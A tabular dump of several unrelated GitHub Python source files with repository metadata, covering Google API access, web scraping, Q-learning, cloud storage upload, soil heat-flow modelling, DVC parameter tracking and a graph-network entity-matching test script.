| seq_id (string, 7-11 chars) | text (string, 156-1.7M chars) | repo_name (string, 7-125 chars) | sub_path (string, 4-132 chars) | file_name (string, 4-77 chars) | file_ext (string, 6 classes) | file_size_in_byte (int64, 156-1.7M) | program_lang (string, 1 class) | lang (string, 38 classes) | doc_type (string, 1 class) | stars (int64, 0-24.2k) | dataset (string, 1 class) | pt (string, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
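Each row below stores a full source file in the `text` column together with its repository metadata. A minimal sketch of how a table like this could be loaded and inspected with the Hugging Face `datasets` library follows; the dataset identifier is a placeholder, not a real published name, and only the column names from the header above are relied on.

```python
# Minimal sketch, assuming this table is published as a Hugging Face dataset
# under a placeholder ID; the column names follow the header above.
from datasets import load_dataset

ds = load_dataset("some-org/github-code-dump", split="train", streaming=True)
row = next(iter(ds))                      # lazily fetch a single record
print(sorted(row.keys()))                 # seq_id, text, repo_name, sub_path, ...
print(row["repo_name"], row["lang"], row["stars"])
print(row["text"][:300])                  # preview the stored source file
```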
19329693229
|
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from google.oauth2.credentials import Credentials
from google.auth.transport.requests import Request
import os
# All scopes together
ALL_SCOPES = [
'https://www.googleapis.com/auth/contacts.readonly',
'https://www.googleapis.com/auth/calendar.readonly',
'https://www.googleapis.com/auth/gmail.readonly'
]
CREDENTIALS_FILE = 'env/token.json'
def get_credentials(scopes):
creds = None
# Load credentials from the file if it exists
if os.path.exists(CREDENTIALS_FILE):
creds = Credentials.from_authorized_user_file(CREDENTIALS_FILE, scopes)
# Refresh or obtain new credentials
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request()) # Use `Request()` as the required argument for `refresh()`
else:
flow = InstalledAppFlow.from_client_secrets_file('env/oauth2_credentials.json', scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(CREDENTIALS_FILE, 'w') as token:
token.write(creds.to_json())
return creds
# Build the service using credentials
def get_authenticated_service(api, version, creds):
return build(api, version, credentials=creds)
# Fetch contacts
def get_contacts(creds):
service = get_authenticated_service('people', 'v1', creds)
results = service.people().connections().list(
resourceName='people/me',
personFields='names,emailAddresses'
).execute()
print("Data type of get_contacts results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
    return results  # return the raw People API response
# Fetch calendar events
def get_calendar_events(creds):
service = get_authenticated_service('calendar', 'v3', creds)
results = service.events().list(calendarId='primary').execute()
print("Data type of get_calendar_events results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
    return results  # return the raw Calendar API response
# Fetch emails
def get_emails(creds):
service = get_authenticated_service('gmail', 'v1', creds)
results = service.users().messages().list(userId='me', maxResults=10).execute()
messages = results.get('messages', [])
full_messages = [] # List to hold the full message details
for message in messages:
msg = service.users().messages().get(userId='me', id=message['id']).execute()
full_messages.append(msg)
return full_messages
if __name__ == "__main__":
creds = get_credentials(ALL_SCOPES)
get_contacts(creds)
get_calendar_events(creds)
get_emails(creds)
|
clarkdever/gcal-gcontacts-sync
|
google_api_utils.py
|
google_api_utils.py
|
py
| 2,803
|
python
|
en
|
code
| 0
|
github-code
|
6
|
19969055167
|
"""
This helps in finding the means and standard deviations of the images to normalize before training.
To run
python3 calculate_means_std.py -i path/to/image/folder/
"""
import argparse
import subprocess
import yaml
import os
import sys
sys.path.remove("/opt/ros/kinetic/lib/python2.7/dist-packages")
import cv2
import numpy as np
def is_image(filename):
return any(filename.endswith(ext) for ext in ['.jpg', '.png'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--image', '-i',
type=str,
required=True,
default=None,
    help='Directory to get the images from.'
)
FLAGS, unparsed = parser.parse_known_args()
# print summary of what we will do
print("----------")
print("INTERFACE:")
#
print("image dir", FLAGS.image)
print("----------\n")
print("----------\n")
#
# create list of images and examine their pixel values
filenames = [os.path.join(dp, f) for dp, dn, fn in os.walk(
os.path.expanduser(FLAGS.image)) for f in fn if is_image(f)]
# examine individually pixel values
counter = 0.0
    pix_val = np.zeros(3, dtype=np.float64)
    for filename in filenames:
        # analyze
print("Accumulating mean", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
        cv_img = cv_img.astype(np.float64) / 255.0
# count pixels and add them to counter
h, w, d = cv_img.shape
counter += h * w
# sum to moving pix value counter in each channel
pix_val += np.sum(cv_img, (0, 1))
# calculate means
means = (pix_val / counter)
# means
print("means(rgb): ", means)
# pass again and calculate variance
    pix_var = np.zeros(3, dtype=np.float64)
    for filename in filenames:
        # analyze
print("Accumulating variance", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
        cv_img = cv_img.astype(np.float64) / 255.0
# sum to moving pix value counter in each channel
pix_var += np.sum(np.square(cv_img - means), (0, 1))
# calculate the standard deviations
stds = np.sqrt(pix_var / counter)
print("stds(rgb): ", stds)
# finalize by printing both
print("*" * 80)
print("means(rgb): ", means)
print("stds(rgb): ", stds)
print("*" * 80)
|
vijaysamula/Building_floor_counter
|
calculate_means_stds.py
|
calculate_means_stds.py
|
py
| 2,438
|
python
|
en
|
code
| 0
|
github-code
|
6
|
13454184469
|
"""
The words list only contains links and no character data. This file fetches the character data list.
"""
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
class Get_chndic_data:
def __init__(self, link):
self.link = link
self.get_data = []
def beautiful_soup(self, link):
"""
        Returns a BeautifulSoup object.
        Methods like the following can be called on the returned value:
        data = soup.find('div', id='container').find('div', class_='section_hsk')
        :param link: the {letter_link} path that goes after https://zh.dict.naver.com/
        :return: raw page data
"""
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('headless')
chrome_options.add_argument('window-size=1920x1080')
chrome_options.add_argument("disable-gpu")
# https://beomi.github.io/2017/09/28/HowToMakeWebCrawler-Headless-Chrome/
        # driver = webdriver.Chrome("D:/dev/chromedriver.exe", chrome_options=chrome_options)  # chromedriver path on the home machine
driver = webdriver.Chrome("C:/Users/user/Downloads/chromedriver.exe", chrome_options=chrome_options)
        # chromedriver path on the work machine
url = f'https://zh.dict.naver.com/{link}'
driver.get(url)
driver.minimize_window()
content = driver.page_source.encode('utf-8').strip()
soup = BeautifulSoup(content, "html.parser")
driver.close()
return soup
def find_letter_inf(self):
"""
        Uses the character link to fetch the character's meaning and pinyin and, for words, the component characters and their links.
        :return: a list built from the data above
"""
        # pinyin still needs to be added.
soup = self.beautiful_soup(self.link)
letter = soup.find('div', id='container').find('div', class_="section section_entry _section_entry") \
.find('div', class_="entry_title _guide_lang").find('strong', class_='word').text
return letter
temp_df = pd.read_csv('../csv/hsk_words_listed.csv', encoding='UTF-8')
hsk_words_link = temp_df.iloc[:, 1]
index = 500
get_data_list = []
########################################## filename change ##################################
for i in range(3000, 3100):
while True:
try:
get_data = Get_chndic_data(hsk_words_link[i])
get_data_list.append(get_data.find_letter_inf())
df = pd.DataFrame(get_data_list)
print(df.tail())
df.to_csv(f'../csv/letters_list{3000}.csv')
break
except AttributeError:
print('try again')
continue
|
i-hs/chn_words_crawling
|
make_database/words_list.py
|
words_list.py
|
py
| 2,691
|
python
|
ko
|
code
| 0
|
github-code
|
6
|
22126010030
|
import math
import random
# read data from file
def getData(fn):
# get data
file = open(fn, 'r')
read = file.readlines()
    file.close()
states = int(read[0]) # number of states
rewards = [] # reward data (also state data)
moves = [] # move data
for i in range(1, len(read)):
row = read[i].split('\n')[0].split(' ')
# append
if i <= states:
row[1] = int(row[1])
rewards.append(row)
else:
row.append(0)
moves.append(row)
return (rewards, moves)
# lookup table -> return index
def lookup(table, coln, value):
for i in range(len(table)):
if table[i][coln] == value: return i
return -1
# Q Learning
def QLearning_(rewards, moves, state, doRandom, times, lastModifiedTimes):
# print
symbol = rewards[state][0] # symbol of state
print('')
print('symbol of state: ' + symbol)
for i in range(len(moves)): print(moves[i])
# find all possible actions
nextstate = []
for i in range(len(moves)):
if moves[i][0] == symbol: nextstate.append(moves[i])
print('possible next moves: ' + str(nextstate))
# decide next action
nextActionIndex = -1 # index of next action
# RANDOM
if random.random() < doRandom:
print('decide RANDOM')
next_ = random.randint(0, len(nextstate)-1)
state = lookup(rewards, 0, nextstate[next_][1]) # update state
nextActionIndex = next_
# BEST state
    else:
        print('decide BEST')
        bestVal = 0
        for i in range(len(nextstate)):
            if nextstate[i][2] > bestVal:
                bestVal = nextstate[i][2]
        # collect all next states whose value ties with the best value,
        # then choose one of them at random
        bestNextIndices = []
        for i in range(len(nextstate)):
            if nextstate[i][2] == bestVal:
                bestNextIndices.append(i)
        selectBestNext = random.choice(bestNextIndices)
        state = lookup(rewards, 0, nextstate[selectBestNext][1]) # update state
        nextActionIndex = selectBestNext
# get immediate reward r(s, a)
r = rewards[state][1]
# find new state s' -> y*max(a')(Q(s', a'))
symbol = rewards[state][0]
maxReward = 0 # next action that has max reward
for i in range(len(moves)):
if moves[i][0] == symbol:
if moves[i][2] > maxReward: maxReward = moves[i][2]
    # Q-learning update: Q(s, a) = r + gamma * max_a' Q(s', a'), with gamma = 0.5
    value = r + 0.5 * maxReward
if nextstate[nextActionIndex][2] != value:
lastModifiedTimes = times
nextstate[nextActionIndex][2] = value
print('update ' + str(nextstate[nextActionIndex][0]) + ' to '
+ str(nextstate[nextActionIndex][1]) + ': ' + str(value))
print('symbol of state : ' + symbol)
print('immediate reward: ' + str(r))
print('max reward : ' + str(maxReward))
return (rewards, moves, state, times, lastModifiedTimes)
# do Q Learning
def QLearning(rewards, moves):
# print
print('Rewards:')
for i in range(len(rewards)): print(rewards[i])
times = 0
lastModifiedTimes = 0 # times when action table was lastly changed
while 1:
# round info
times += 1
doRandom = 10/(times+10) # probability of searching randomly
print('')
print('----------------<<<< ROUND ' + str(times) + ' >>>>----------------')
# do Q learning until the last state
state = 0
while state != len(rewards)-1:
(rewards, moves, state, times, lastModifiedTimes) = QLearning_(rewards, moves, state, doRandom, times, lastModifiedTimes)
# break when converged
if lastModifiedTimes * 2 + 10 < times: break
if __name__ == '__main__':
(rewards, moves) = getData('QLearning.txt')
QLearning(rewards, moves)
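# Assumed input format for 'QLearning.txt', inferred from getData() above
# (the symbols and numbers below are made up for illustration only):
#
#   4        <- number of states
#   A 0      <- state symbol and its immediate reward
#   B 0
#   C 0
#   D 100
#   A B      <- allowed move from state A to state B (a Q value of 0 is appended)
#   B C
#   C D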
|
WannaBeSuperteur/AI
|
QLearning.py
|
QLearning.py
|
py
| 4,032
|
python
|
en
|
code
| 0
|
github-code
|
6
|
33708620212
|
import os
from google.cloud import storage
class GoogleStorageLoader():
def __init__(self) -> None:
"""Start Google Cloud clint - could be used for uploading to storage
"""
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "../content/key-bucket.json"
self.client = storage.Client()
def upload_to_bucket(self, bucket_name, source_file, destination):
"""uploads file to the bucket
Args:
            bucket_name (str): name of the target Cloud Storage bucket
            source_file (str): local path of the file to upload
            destination (str): destination blob name inside the bucket
"""
bucket = self.client.bucket(bucket_name)
blob = bucket.blob(destination)
blob.upload_from_filename(source_file)
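# Minimal usage sketch (the bucket and file names below are placeholders, not
# values from the original project):
if __name__ == "__main__":
    loader = GoogleStorageLoader()
    loader.upload_to_bucket(
        bucket_name="example-bucket",
        source_file="data/reddit_posts.json",
        destination="raw/reddit_posts.json",
    )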
|
IhorLuk/reddit_api_data_ingestion
|
src/storage.py
|
storage.py
|
py
| 724
|
python
|
en
|
code
| 0
|
github-code
|
6
|
41054313506
|
# coding: utf-8
# # Heat Diffusion in Soils
#
# This Jupyter Notebook gives an example how to implement a 1D heat diffusion model in Python.
#
# First we need to import the packages which we will be using:
#
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import CoupledHeatWaterFlowTHe as cfun
import MyTicToc as mt
sns.set()
## Main
# In[0:] Domain & Soil properties
nIN = 51
# soil profile down to 2 meters depth
zIN = np.linspace(-2.0, 0, num=nIN).reshape(nIN, 1)
# nIN = np.shape(zIN)[0]
zN = np.zeros(nIN - 1).reshape(nIN - 1, 1)
zN[0, 0] = zIN[0, 0]
zN[1:nIN - 2, 0] = (zIN[1:nIN - 2, 0] + zIN[2:nIN - 1, 0]) / 2
zN[nIN - 2, 0] = zIN[nIN - 1]
nN = np.shape(zN)[0]
ii = np.arange(0, nN - 1)
dzN = (zN[ii + 1, 0] - zN[ii, 0]).reshape(nN - 1, 1)
dzIN = (zIN[1:, 0] - zIN[0:-1, 0]).reshape(nIN - 1, 1)
# collect model dimensions in a pandas series: mDim
mDim = {'zN' : zN,
'zIN' : zIN,
'dzN' : dzN,
'dzIN' : dzIN,
'nN' : nN,
'nIN' : nIN
}
mDim = pd.Series(mDim)
# ## Definition of material properties
# In this section of the code we define the material properties
# Soil Properties
# [J/(m3 K)] volumetric heat capacity of soil solids
zetaSol = 2.235e6
# [J/(m3 K)] volumetric heat capacity of water (Fredlund 2006)
zetaWat = 4.154e6
# rhoW = 1000 # [kg/m3] density of water
rhoS = 2650 # [kg/m3] density of solid phase
rhoB = 1700 # %[kg/m3] dry bulk density of soil
n = 1 - rhoB / rhoS # [-] porosity of soil = saturated water content.
qCont = 0.75 # quartz content
# collect soil parameters in a pandas Series: sPar
sPar = {'vGA': np.ones(np.shape(zN)) * 1 / 2.0, # alpha[1/m]
'vGN': np.ones(np.shape(zN)) * 2.0, # n[-]
'vGM': np.ones(np.shape(zN)) * (1 - 1 / 2.0), # m = 1-1/n[-]
'thS': np.ones(np.shape(zN)) * 0.4, # saturated water content
'thR': np.ones(np.shape(zN)) * 0.03, # residual water content
'KSat': np.ones(np.shape(zN)) * 0.25, # [m/day]
'vGE': 0.5, # power factor for Mualem-van Genuchten
'Cv': 1.0e-8, # compressibility of compact sand [1/Pa]
'viscRef': cfun.ViscosityWaterT(283.15),
'qCont': qCont, # quartz content
}
sPar = pd.Series(sPar)
# In[1:] Definition of the Boundary Parameters
# Read meteodata
meteo_data = pd.read_excel('WieringermeerData_Meteo.xlsx')
meteo_data['num_date'] = meteo_data['datetime'].astype(np.int64)/(1e9*3600*24)
meteo_data.set_index('datetime',inplace=True)
# set simulation time to numeric dates from boundary data...
t_range = meteo_data['num_date'][:-1]
taxis = meteo_data.index[:-1]
# collect boundary parameters in a named tuple boundpar...
def BndTTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
bndT = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
topT = bPar.meteo_data['temp'].iloc[md_ind].values
bndT[ii] = 273.15 + topT
return bndT
def BndqWatTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
qBnd = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
rf = bPar.meteo_data['rain_station'].iloc[md_ind].values
qBnd[ii] = -rf
return qBnd
bPar = {'topBndFuncHeat': BndTTop,
'meteo_data': meteo_data,
'topCond': 'Robin',
'lambdaRobTop': 1e9,
'lambdaRobBot': 0,
'TBndBot': 273.15 + 10,
'topBndFuncWat': BndqWatTop, #topBndFuncWat(t,bPar)
'bottomTypeWat': 'Robin', # Robin condition or Gravity condition
'kRobBotWat': 0.05, # Robin resistance term for bottom
'hwBotBnd': 1.0, # pressure head at lower boundary
}
bPar = pd.Series(bPar)
# In[3:] Define Initial Conditions
zRef = -1.0 # depth of water table
hwIni = zRef - zN
TIni = np.ones(np.shape(zN)) * (10.0 + 273.15) # K
sVecIni = np.concatenate([hwIni, TIni], axis=0)
# Time Discretization
tOut = np.linspace(t_range[0],t_range[365],365*5)
#tplot = taxis[0:50]
nOut = np.shape(tOut)[0]
nOut = len(tOut)
# tOut = np.sort(np.hstack((tOut1, bTime))) # time
# copy initial vector to hw0. Apply squeeze to compress it to one dimension
mt.tic()
int_result = cfun.IntegrateCHWF(tOut, sVecIni, sPar, mDim, bPar)
mt.toc()
hWSim = int_result.y[0:nN]
TSim = int_result.y[nN:2*nN]
thSim = cfun.thFun(hWSim,sPar)
qWSim = cfun.WatFlux(tOut,hWSim,TSim,sPar,mDim,bPar)
qHSim = cfun.HeatFlux(tOut, TSim, hWSim, sPar, mDim, bPar)
#mt.tic()
#TOutPic, hwOutPic = himp.HalfImplicitPicar(tOut2, hw0, T0, sPar, mDim, bPar, tPar)
#mt.toc()
sns.set()
plt.close('all')
fig1, ax1 = plt.subplots(figsize=(7, 4))
ii = np.arange(nN-1, 0, -10)
ax1.plot(tOut, TSim[ii,].T, '-')
ax1.set_title('Temperature (ODE)')
ax1.set_xlabel('time (days)')
ax1.set_ylabel('temperature [K]')
ax1.legend(zN[ii])
fig2, ax2 = plt.subplots(figsize=(7, 7))
jj = np.arange(0, nOut)
ax2.plot(TSim[:, jj], zN, '-')
ax2.set_title('Temperature vs. depth (ODE)')
ax2.set_ylabel('depth [m]')
ax2.set_xlabel('temperature [K]')
fig3, ax3 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax3.plot(tOut, qHSim[ii,:].T, '-')
ax3.set_title('Heat flux over time (ODE)')
ax3.set_ylabel('heat flux [J/(m2 d)]')
ax3.set_xlabel('time [d]')
ax3.legend(zN[ii])
fig4, ax4 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax4.plot(tOut, hWSim[ii,:].T, '-')
ax4.set_ylabel('pressure head [m]')
ax4.set_xlabel('time [d]')
#plot pressure head as a function of depth. Here we plot every time step
fig5, ax5 = plt.subplots(figsize=(7, 7))
ax5.plot(hWSim, zN, '-')
ax5.grid(b=True)
ax5.set_xlabel('pressure head [m]')
ax5.set_ylabel('depth [m]')
# plt.savefig('myfig.png')
fig6, ax6 = plt.subplots(figsize=(7, 7))
ax6.plot(thSim, zN, '-')
ax6.grid(b=True)
ax6.set_xlabel('water content [-]')
ax6.set_ylabel('depth [m]')
fig7, ax7 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax7.plot(tOut, thSim[ii,:].T, '-')
ax7.set_ylabel('water content [-]')
ax7.set_xlabel('time [d]')
ax7.legend(zN[ii])
fig8, ax8 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax8.plot(tOut, qWSim[ii,:].T, '-')
ax8.set_title('Water Flux ')
ax8.set_ylabel('water flux [m/d]')
ax8.set_xlabel('time [d]')
ax8.legend(zN[ii])
fig1.savefig('./figures_scenarios/3_figure1.png')
fig2.savefig('./figures_scenarios/3_figure2.png')
fig3.savefig('./figures_scenarios/3_figure3.png')
fig4.savefig('./figures_scenarios/3_figure4.png')
fig5.savefig('./figures_scenarios/3_figure5.png')
fig6.savefig('./figures_scenarios/3_figure6.png')
fig7.savefig('./figures_scenarios/3_figure7.png')
fig8.savefig('./figures_scenarios/3_figure8.png')
# import shelve
# filename='/tmp/shelve.out'
# my_shelf = shelve.open(filename,'n') # 'n' for new
# for key in dir():
# try:
# my_shelf[key] = globals()[key]
# except TypeError:
# #
# # __builtins__, my_shelf, and imported modules can not be shelved.
# #
# print('ERROR shelving: {0}'.format(key))
# my_shelf.close()
|
solomelittle/EL-Individual-Assignment
|
03_ScriptCH_WieringermeerBoundary.py
|
03_ScriptCH_WieringermeerBoundary.py
|
py
| 7,445
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3477283820
|
import logging
import os
import typing
from collections import defaultdict
from typing import Dict
import dpath.util
from voluptuous import Any
from dvc.exceptions import DvcException
from dvc.utils.serialize import ParseError, load_path
from dvc_data.hashfile.hash_info import HashInfo
from .base import Dependency
logger = logging.getLogger(__name__)
class MissingParamsError(DvcException):
pass
class MissingParamsFile(DvcException):
pass
class ParamsIsADirectoryError(DvcException):
pass
class BadParamFileError(DvcException):
pass
class ParamsDependency(Dependency):
PARAM_PARAMS = "params"
PARAM_SCHEMA = {PARAM_PARAMS: Any(dict, list, None)}
DEFAULT_PARAMS_FILE = "params.yaml"
def __init__(self, stage, path, params=None, repo=None):
self.params = list(params) if params else []
info = (
{self.PARAM_PARAMS: params} if isinstance(params, dict) else None
)
repo = repo or stage.repo
path = path or os.path.join(repo.root_dir, self.DEFAULT_PARAMS_FILE)
super().__init__(stage, path, info=info, repo=repo)
def dumpd(self):
ret = super().dumpd()
if not self.hash_info:
ret[self.PARAM_PARAMS] = self.params or {}
return ret
def fill_values(self, values=None):
"""Load params values dynamically."""
if values is None:
return
info = {}
if not self.params:
info.update(values)
for param in self.params:
if param in values:
info[param] = values[param]
self.hash_info = HashInfo(self.PARAM_PARAMS, info)
def read_params(
self, flatten: bool = True, **kwargs: typing.Any
) -> Dict[str, typing.Any]:
try:
config = self.read_file()
except MissingParamsFile:
config = {}
if not self.params:
return config
ret = {}
if flatten:
for param in self.params:
try:
ret[param] = dpath.util.get(config, param, separator=".")
except KeyError:
continue
return ret
from dpath.util import merge
for param in self.params:
merge(
ret,
dpath.util.search(config, param, separator="."),
separator=".",
)
return ret
def workspace_status(self):
if not self.exists:
return {str(self): "deleted"}
if self.hash_info.value is None:
return {str(self): "new"}
from funcy import ldistinct
status = defaultdict(dict)
info = self.hash_info.value if self.hash_info else {}
actual = self.read_params()
# NOTE: we want to preserve the order of params as specified in the
# status. In case of tracking the whole file, the order is top-level
# keys in the file and then the keys in the `info` from `dvc.lock`
# (which are alphabetically sorted).
params = self.params or ldistinct([*actual.keys(), *info.keys()])
for param in params:
if param not in actual:
st = "deleted"
elif param not in info:
st = "new"
elif actual[param] != info[param]:
st = "modified"
else:
assert actual[param] == info[param]
continue
status[str(self)][param] = st
return status
def status(self):
return self.workspace_status()
def validate_filepath(self):
if not self.exists:
raise MissingParamsFile(f"Parameters file '{self}' does not exist")
if self.isdir():
raise ParamsIsADirectoryError(
f"'{self}' is a directory, expected a parameters file"
)
def read_file(self):
self.validate_filepath()
try:
return load_path(self.fs_path, self.repo.fs)
except ParseError as exc:
raise BadParamFileError(
f"Unable to read parameters from '{self}'"
) from exc
def get_hash(self):
info = self.read_params()
missing_params = set(self.params) - set(info.keys())
if missing_params:
raise MissingParamsError(
"Parameters '{}' are missing from '{}'.".format(
", ".join(missing_params), self
)
)
return HashInfo(self.PARAM_PARAMS, info)
def save(self):
if not self.exists:
raise self.DoesNotExistError(self)
if not self.isfile and not self.isdir:
raise self.IsNotFileOrDirError(self)
self.ignore()
self.hash_info = self.get_hash()
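# Illustration (not part of dvc): how dpath resolves dotted parameter names
# against a nested dict, which is what read_params() above relies on.
if __name__ == "__main__":
    config = {"train": {"lr": 0.01, "epochs": 10}}
    # flatten=True path: fetch a single dotted key
    print(dpath.util.get(config, "train.lr", separator="."))     # 0.01
    # flatten=False path: merge the matching subtree into a result dict
    nested = {}
    dpath.util.merge(nested, dpath.util.search(config, "train.lr", separator="."), separator=".")
    print(nested)                                                 # {'train': {'lr': 0.01}}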
|
gshanko125298/Prompt-Engineering-In-context-learning-with-GPT-3-and-LLMs
|
myenve/Lib/site-packages/dvc/dependency/param.py
|
param.py
|
py
| 4,814
|
python
|
en
|
code
| 3
|
github-code
|
6
|
42072257921
|
#!/usr/bin/env python
# coding: utf-8
# In[36]:
import requests
from bs4 import BeautifulSoup
import pandas
list1=[]
for page in range(0,30,10):
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="+str(page)+".html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c= r.content
soup=BeautifulSoup(c,"html.parser")
all=soup.find_all("div",{"class":"propertyRow"})
x=all[0].find("h4",{"class":"propPrice"}).text
for item in all:
d={}
d["Address"]=item.find_all("span",{"class":"propAddressCollapse"})[0].text
try:
d["Locality"]=item.find_all("span",{"class":"propAddressCollapse"})[1].text
except:
d["Locality"]=None
d["Price"]=item.find("h4",{"class":"propPrice"}).text.replace("\n","").strip()
try:
d["Beds"]=item.find("span",{"class":"infoBed"}).find("b").text
except:
d["Beds"]=None
try:
d["Area"]=item.find("span",{"class":"infoSqFt"}).find("b").text
except:
d["Area"]=None
try:
d["Full Baths"]=item.find("span",{"class":"infoValueFullBath"}).find("b").text
except:
d["Full Baths"]=None
try:
d["Half Baths"]=item.find("span",{"class":"infoValueHalfBath"}).find("b").text
except:
d["Half Baths"]=None
for column_group in item.find_all("div",{"class":"columnGroup"}):
for fg , fn in zip(column_group.find_all("span",{"class":"featureGroup"}),column_group.find_all("span",{"class":"featureName"})):
if "Lot Size" in fg.text :
d["Lot Size"]=fn.text
list1.append(d)
df=pandas.DataFrame(list1)
df.to_csv("output.csv")
|
shivangijain827/python-projects
|
web - scraper/main.py
|
main.py
|
py
| 1,883
|
python
|
en
|
code
| 0
|
github-code
|
6
|
74099804029
|
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pandas as pd
import argparse
from dataset import collate_fn, MergedMatchingDataset
from torch.utils.data import DataLoader
from EmbedModel import EmbedModel
from GCN import gcn
from logger import set_logger
from utils import _read_csv, accuracy
def fetch_edge(batch):
edges = []
types = []
for ex in batch:
type = ex["type"]
center_id = ex["center"][0]
neighbors = []
if "neighbors_mask" in ex:
for i, n in enumerate(ex["neighbors"]):
if ex["neighbors_mask"][i] == 0:
continue
neighbors.append(n)
else:
neighbors = ex["neighbors"]
if type == 'l':
edges += [[center_id, n[0]] for n in neighbors]
types += [0] * len(neighbors)
elif type == 'r':
edges += [[n[0], center_id] for n in neighbors]
types += [1] * len(neighbors)
else:
raise NotImplementedError
return edges, types
def calculate_f1(edges, scores, labels, types, score_type='left'):
score_dict={}
for i, edge in enumerate(edges):
score = scores[i]
label = labels[i]
e = tuple(edge)
if e in score_dict:
assert score_dict[e][1] == label
if score_type == 'max':
score_dict[e] = (max(score_dict[e][0],score),label)
elif score_type == 'mean':
score_dict[e] = ((score_dict[e][0] + score) / 2.0, label)
elif score_type == 'min':
score_dict[e] = (min(score_dict[e][0], score), label)
else:
raise NotImplementedError
else:
score_dict[e] = (score,label)
score_label = score_dict.values()
scores = np.asarray([i[0] for i in score_label])
label = np.asarray([i[1] for i in score_label])
pred = (scores > 0.5).astype('int')
TP = np.sum((pred == 1) * (label == 1))
TN = np.sum((pred == 0) * (label == 0))
FP = np.sum((pred == 1) * (label == 0))
FN = np.sum((pred == 0) * (label == 1))
acc = (TP + TN) * 1.0 / (TP + TN + FN + FP)
if TP == 0:
p = r = f1 =0.0
else:
p = TP * 1.0 / (TP + FP)
r = TP * 1.0 / (TP + FN)
f1 = 2 * p * r / (p + r)
return p, r, f1, acc, score_dict
def test(iter,logger,model,embed_model,crit,test_step=None,tf_logger=None,score_type='mean', prefix='Test'):
model.eval()
embed_model.eval()
edges = []
scores = []
labels = []
types = []
for j, batch in enumerate(iter):
with torch.no_grad():
edge,type = fetch_edge(batch)
feature, A, label, masks = embed_model(batch)
masks = masks.view(-1)
label = label.view(-1)[masks == 1].long()
pred = model(feature, A)
pred = pred[masks == 1]
loss = crit(pred, label)
pred = F.softmax(pred, dim=1)
p, r, acc = accuracy(pred, label)
logger.info(
                '{}\t[{:d}/{:d}]\tLoss {:.3f}\tAccuracy {:.3f}\tPrecision {:.3f}\tRecall {:.3f}'.format(prefix,j+1,len(iter),loss,acc,
p, r))
assert pred.shape[0] == label.shape[0]
scores += pred[:,1].detach().cpu().numpy().tolist()
edges += edge
labels += label.detach().cpu().numpy().tolist()
types += type
edges = np.asarray(edges)
scores = np.asarray(scores)
labels = np.asarray(labels)
types = np.asarray(types)
if not isinstance(score_type,list):
score_type = [score_type]
f1s = []
for t in score_type:
p, r, f1, acc, score_dict = calculate_f1(edges, scores, labels, types, score_type=t.lower())
f1s.append(f1)
        logger.info('{}\t{}\tPrecision {:.3f}\tRecall {:.3f}\tF1-score {:.3f}\tAccuracy {:.3f}'.format(prefix, t, p, r, f1, acc))
if tf_logger:
tf_logger.add_scalar('{}/{}/Precision'.format(prefix, t), p, test_step)
tf_logger.add_scalar('{}/{}/Recall'.format(prefix, t), r, test_step)
tf_logger.add_scalar('{}/{}/f1Score'.format(prefix, t), f1, test_step)
tf_logger.add_scalar('{}/{}/Accuracy'.format(prefix, t), acc, test_step)
return f1s
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# misc
working_dir = osp.dirname(osp.abspath(__file__))
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--score_type', type=str, nargs='+')
# Test args
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--tableA_path', type=str)
parser.add_argument('--tableB_path', type=str)
parser.add_argument('--train_path', type=str)
parser.add_argument('--test_path', type=str)
parser.add_argument('--val_path', type=str)
parser.add_argument('--checkpoint_path', type=str)
# Device
parser.add_argument('--gpu', type=int, default=[0], nargs='+')
# Model
parser.add_argument('--gcn_layer', default=1, type=int)
args = parser.parse_args()
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
tableA = _read_csv(args.tableA_path)
tableB = _read_csv(args.tableB_path)
useful_field_num = len(tableA.columns) - 1
gcn_dim = 768
test_dataset = MergedMatchingDataset(args.test_path, tableA, tableB, other_path=[args.train_path, args.val_path])
test_iter = DataLoader(test_dataset, batch_size=args.batch_size, collate_fn=collate_fn, shuffle=False)
embedmodel = EmbedModel(useful_field_num=useful_field_num,device=args.gpu)
model = gcn(dims=[gcn_dim]*(args.gcn_layer + 1))
